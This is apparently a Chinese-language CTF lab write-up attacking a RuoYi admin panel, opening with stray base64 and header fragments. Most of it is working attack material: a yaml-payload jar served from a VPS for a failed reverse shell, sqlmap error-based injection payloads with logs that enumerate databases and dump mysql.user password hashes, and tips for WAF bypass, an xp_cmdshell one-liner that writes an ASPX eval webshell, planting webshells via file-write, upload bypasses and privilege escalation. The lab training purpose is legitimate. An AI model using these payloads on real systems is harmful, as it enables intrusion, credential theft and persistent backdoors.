Axw45jzxkGI/s00Tt2jerHV4uQvWoCLoks4Ke4PF1ucDSmqklE3bT9OblzAiv7NrK1Q13jXbMDG7voyCKU4ViqW7UmkWfjPW8mnsgTtkQYbQnXzC9okQHBxmyKhJHatq2u5n55kEVnJHw0pk15xqdP8au1//it6vbQzMSDUzg2LQeyamCK8CjgT4I2sEjgRjcUXmJ7lFI50dEpeywR9lSMyXfhXwBEg+AueRRX49+pxnOP93vJpGkiMvhYi1KyQ774zN9Uxjw7YcrG+8su5x2U+T6KQCaH2A8DD0HJQOZz2YLOFKomFNmIzzk/VSoPLoGwH5bt9fXIwg2bipekkEjlFTSOFYkJscnFNBxlzhNE5X0BsLzG9SLc52dovagXpxCMegWAVbmPxK9JoURO2sBRXXBt77TWfrrDBMo14bTDdrRWVX9tTem0AYaKPGm0YTTd8rfN/ACal2tM1TAXMKz9kVFOGIKxQfUb+YkPWL6qRrB6+UDOZh3nzFccWPf7kwtqRAYqpvW/wSMe3whflypN/RCA0MVDvTF8nYB8JCShW37JLGcoOpLU3pOX25L0vHNkqt/OcBrEaDOHF9bS1MYEcaOTwCAgHm8pB22L79vHLA9bQMX1uxp4/fttDQ6/Dz4Td/8imEJJsuCH9V1ESI3M79qQvPSc96UPGwAbnS+Ni77zsNCypIn6FfHFxG2f1gJ97Az1BMMKgPKimdmMN1j91ZlubCYScjOYKl2
Upgrade-Insecure-Requests: 1
若依后台定时任务RCE
root@oexie9c7ndyat1k:~# cd yaml-payload-master/
root@oexie9c7ndyat1k:~/yaml-payload-master# ls
README.md src yaml-payload.yml
root@oexie9c7ndyat1k:~/yaml-payload-master# javac src/artsploit/AwesomeScriptEngineFactory.java
root@oexie9c7ndyat1k:~/yaml-payload-master# jar -cvf yaml-payload.jar -C src/ .
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1763) (out= 789)(deflated 55%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1654) (out= 499)(deflated 69%)
root@oexie9c7ndyat1k:~/yaml-payload-master# python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
vps收到了请求,但是没有成功反弹shell
(这里尝试了半天,不清楚什么情况,无法反弹shell)
此处为靶场,实战中证明到这一步就可以提交漏洞了,但是靶场中我们要拿到flag,利用注入点读取数据库里的信息
PS E:\sqlmap\sqlmapproject-sqlmap-bb48dd0> python .\sqlmap.py -r .\3.txt --technique E --dbs --batch
___
__H__
___ ___[(]_____ ___ ___ {1.8.1.6#dev}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:16:09 /2024-05-11/
[17:16:09] [INFO] parsing HTTP request from '.\3.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:16:10] [INFO] resuming back-end DBMS 'mysql'
[17:16:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=¶ms[beginTime]=¶ms[endTime]=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]= AND (SELECT 7901 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(7901=7901,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[17:16:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:16:10] [INFO] fetching database names
[17:16:10] [WARNING] reflective value(s) found and filtering out
[17:16:10] [INFO] retrieved: 'information_schema'
[17:16:10] [INFO] retrieved: 'mysql'
[17:16:11] [INFO] retrieved: 'performance_schema'
[17:16:11] [INFO] retrieved: 'ry'
[17:16:11] [INFO] retrieved: 'test'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] ry
[*] test
[17:16:11] [INFO] fetched data logged to text files under 'C:\Users\jack\AppData\Local\sqlmap\output\wba2x0kpf.lab.aqlab.cn'
[*] ending @ 17:16:11 /2024-05-11/读取”ry“数据库中的信息
PS E:\sqlmap\sqlmapproject-sqlmap-bb48dd0> python .\sqlmap.py -r .\3.txt --technique E -D "ry" --batch --tables
___
__H__
___ ___[)]_____ ___ ___ {1.8.1.6#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:20:07 /2024-05-11/
[17:20:07] [INFO] parsing HTTP request from '.\3.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:20:07] [INFO] resuming back-end DBMS 'mysql'
[17:20:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=¶ms[beginTime]=¶ms[endTime]=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]= AND (SELECT 7901 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(7901=7901,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[17:20:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:20:08] [INFO] fetching tables for database: 'ry'
[17:20:08] [WARNING] reflective value(s) found and filtering out
[17:20:08] [INFO] retrieved: 'QRTZ_BLOB_TRIGGERS'
[17:20:08] [INFO] retrieved: 'QRTZ_CALENDARS'
[17:20:08] [INFO] retrieved: 'QRTZ_CRON_TRIGGERS'
[17:20:08] [INFO] retrieved: 'QRTZ_FIRED_TRIGGERS'
[17:20:08] [INFO] retrieved: 'QRTZ_JOB_DETAILS'
[17:20:09] [INFO] retrieved: 'QRTZ_LOCKS'
[17:20:09] [INFO] retrieved: 'QRTZ_PAUSED_TRIGGER_GRPS'
[17:20:09] [INFO] retrieved: 'QRTZ_SCHEDULER_STATE'
[17:20:09] [INFO] retrieved: 'QRTZ_SIMPLE_TRIGGERS'
[17:20:09] [INFO] retrieved: 'QRTZ_SIMPROP_TRIGGERS'
[17:20:09] [INFO] retrieved: 'QRTZ_TRIGGERS'
[17:20:09] [INFO] retrieved: 'gen_table'
[17:20:10] [INFO] retrieved: 'gen_table_column'
[17:20:10] [INFO] retrieved: 'sys_config'
[17:20:10] [INFO] retrieved: 'sys_dept'
[17:20:10] [INFO] retrieved: 'sys_dict_data'
[17:20:10] [INFO] retrieved: 'sys_dict_type'
[17:20:10] [INFO] retrieved: 'sys_job'
[17:20:10] [INFO] retrieved: 'sys_job_log'
[17:20:10] [INFO] retrieved: 'sys_logininfor'
[17:20:10] [INFO] retrieved: 'sys_menu'
[17:20:10] [INFO] retrieved: 'sys_notice'
[17:20:10] [INFO] retrieved: 'sys_oper_log'
[17:20:11] [INFO] retrieved: 'sys_post'
[17:20:11] [INFO] retrieved: 'sys_role'
[17:20:11] [INFO] retrieved: 'sys_role_dept'
[17:20:11] [INFO] retrieved: 'sys_role_menu'
[17:20:11] [INFO] retrieved: 'sys_user'
[17:20:11] [INFO] retrieved: 'sys_user_online'
[17:20:11] [INFO] retrieved: 'sys_user_post'
[17:20:11] [INFO] retrieved: 'sys_user_role'
Database: ry
[31 tables]
+--------------------------+
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_LOCKS |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_SIMPROP_TRIGGERS |
| QRTZ_TRIGGERS |
| gen_table |
| gen_table_column |
| sys_config |
| sys_dept |
| sys_dict_data |
| sys_dict_type |
| sys_job |
| sys_job_log |
| sys_logininfor |
| sys_menu |
| sys_notice |
| sys_oper_log |
| sys_post |
| sys_role |
| sys_role_dept |
| sys_role_menu |
| sys_user |
| sys_user_online |
| sys_user_post |
| sys_user_role |
+--------------------------+
[17:20:11] [INFO] fetched data logged to text files under 'C:\Users\jack\AppData\Local\sqlmap\output\wba2x0kpf.lab.aqlab.cn'
[*] ending @ 17:20:11 /2024-05-11/读了半天发现flag是在/tmp目录下
但是也借着这个靶场的练习记录一下sqlmap的一些玩法tips
比如sqlmap -u “xxxxx” --file-write="/root/Desktop/1.txt" --file-dest=“f:\1.txt” sqlmap写文件,需要dba权限
2.假入我们在sqlmap输入sqlmap -u www.xxxx/aboutus.php?id=1 --current-db ,无法完成注入,我们可以加以点东西,例如,
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --hex,–hex是进行16进制编码,有几率绕过.
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --no-cast,该参数也是一种编码,也有几率绕过。
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --hpp,该参数为是对http参数进行污染,也有几率绕过。
sqlmap -u www.xxxx/aboutus.php?id=1 --current-db --tamper apostrophemask.py 使用脚本绕过,这个脚本是换成utf-8的格式
–sql-shell 进入一个交互式shell页面,select host,user,password from mysql.user这条命令可以快速查出数据库的用户和密码
PS E:\sqlmap\sqlmapproject-sqlmap-bb48dd0> python .\sqlmap.py -r .\3.txt --technique E --sql-shel --batch
___
__H__
___ ___[(]_____ ___ ___ {1.8.1.6#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:48:23 /2024-05-11/
[17:48:23] [INFO] parsing HTTP request from '.\3.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[17:48:23] [INFO] resuming back-end DBMS 'mysql'
[17:48:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pageSize=10&pageNum=1&orderByColumn=createTime&isAsc=desc&deptId=&parentId=&loginName=&phonenumber=&status=¶ms[beginTime]=¶ms[endTime]=pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]= AND (SELECT 3348 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(3348=3348,1))),0x716b626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[17:48:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:48:23] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select host,user,password from mysql.user
[17:48:35] [INFO] fetching SQL SELECT statement query output: 'select host,user,password from mysql.user'
[17:48:35] [WARNING] reflective value(s) found and filtering out
[17:48:36] [INFO] retrieved: '127.0.0.1'
[17:48:36] [INFO] retrieved: 'root'
[17:48:36] [INFO] retrieved: '*81F5E21E3540D884ACD4A731AEBFB6AF209E1B'
[17:48:36] [INFO] retrieved: '927c878f177'
[17:48:36] [INFO] retrieved: ''
[17:48:36] [INFO] retrieved: ''
[17:48:36] [INFO] retrieved: '927c872f177'
[17:48:36] [INFO] retrieved: 'root'
[17:48:36] [INFO] retrieved: ''
[17:48:36] [INFO] retrieved: '::1'
[17:48:37] [INFO] retrieved: 'root'
[17:48:37] [INFO] retrieved: ''
[17:48:37] [INFO] retrieved: 'localhost'
[17:48:37] [INFO] retrieved: ''
[17:48:37] [INFO] retrieved: ''
[17:48:37] [INFO] retrieved: 'localhost'
[17:48:37] [INFO] retrieved: 'root'
[17:48:37] [INFO] retrieved: ''
select host,user,password from mysql.user [6]:
[*] 127.0.0.1, root, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*] 927c88f177, ,
[*] 927c72f177, root,
[*] ::1, root,
[*] localhost, ,
[*] localhost, root,
sql-shell>由于目前我对Ruoyi的网站目录也不熟悉,--os-shell没成功,这个点后面熟悉了再来补充吧
获取shell的几种方式
2. 直连获取shell
sqlmap -d mssql://sa:sa@192.168.91.131:1433/master --os-shell
4.5.2 获取webshell或shell条件
1. PHP+MySQL类型网站获取webshell
(1) MySQL root账号权限,即配置MySQL连接的账号为root账号,不是root账号具备root权限也可
(2) GPC配置关闭,能使用单引号
(3) 有网站的绝对路径,且具备可以在文件夹写入文件的权限
(4) 没有配置secure-file-priv属性
2. MSSQL+ASP/ASP.net类型网站获取webshell条件
(1) 数据库用户是sa
(2) 能够创建xp_cmdshell
(3) 知道真实路径
(4) 可以通过echo命令生成shell
';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval (Request.Item["bmfx"], "unsafe");%^ >> C:\tools\fx.aspx';--
4.5.3 获取webshell权限思路及命令
1. PHP类型网站获取webshell权限思路
(1) 获取os-shell
sqlmap.py -u "http://www.xxx.com/index.php?id=2" --os-shell
(2) 选择4PHP类型的语言
(3) 物理路径的选择
普通路径,指定路径,指定字典文件进行暴力破解,暴力搜索地址
(4) 获取webshell
在sqlmap中无法直接获取webshell,如果--os-shell整个命令执行完成,就会上传两个文件,sqlmap会给你提示上传的文件名,一个文件是后门文件,可以通过参数传递命令直接执行shell,另一个文件是文件上传功能页面,访问这个页面可以直接上传文件
(5) PHP获取webshell难点
在整个过程中获取网站的真实物理路径是最重要的,一般可以通过phpinfo函数,测试页面,及报错信息,搜素引擎,目录爆破的方式来获取网站的真实物理路径,如果获取到了管理员的账号,能够登录后台,如果后台有一些探针功能或者是系统运行情况的页面,那么也可以获取真实的物理路径,如果实在无法获取那只能暴力猜解或者社工等其他方式。
2. 直接写入webshell到网站
sqlmap.py -u "http://www.xxx.com/index.php?id=3" --file-write /opt/bmfx.php --file-dest /var/www/html/shell.php
bmfx.php是攻击者本地文件,shell.php是上传到目标站点的文件名称
3. os-shell下载文件执行
4. 通过sqlmap连接MySQL获取shell
5. 账号登录管理后台,寻找上传点
(1) 后台直接上传webshell
(2) 抓包构建绕过防护上传webshell
(3) IIS 6 畸形文件漏洞绕过,即上传1.asp;jpg图片一句话
(4) IIS 7 CGI解析漏洞,上传webshell图片文件,访问http://www.xxx.com/1.jpg/1.php
(5) FCK文件两次上传获取webshell
(6) 其他上传漏洞获取webshell
4.5.4 获取system权限思路
1. MSSQL和MySQL数据库获取system权限
(1) 生成系统信息
systeminfo > bmfx.txt
(2) 使用windows-exploit-suggester.py 检查是否存在未打补丁的漏洞
(3) 找到漏洞对应exp直接提权
2. 直接获取system权限
有些服务器是直接使用高权限启动服务,可以通过sqlmap直接获取系统权限
3. 社工提权
有些root/sa账号对应的数据库密码就是系统Windows/Linux系统的管理员密码
4. 密码账号暴力破解
通过前面获取到系统准确的账号信息,可以尝试SSH/RDP账号的暴力破解
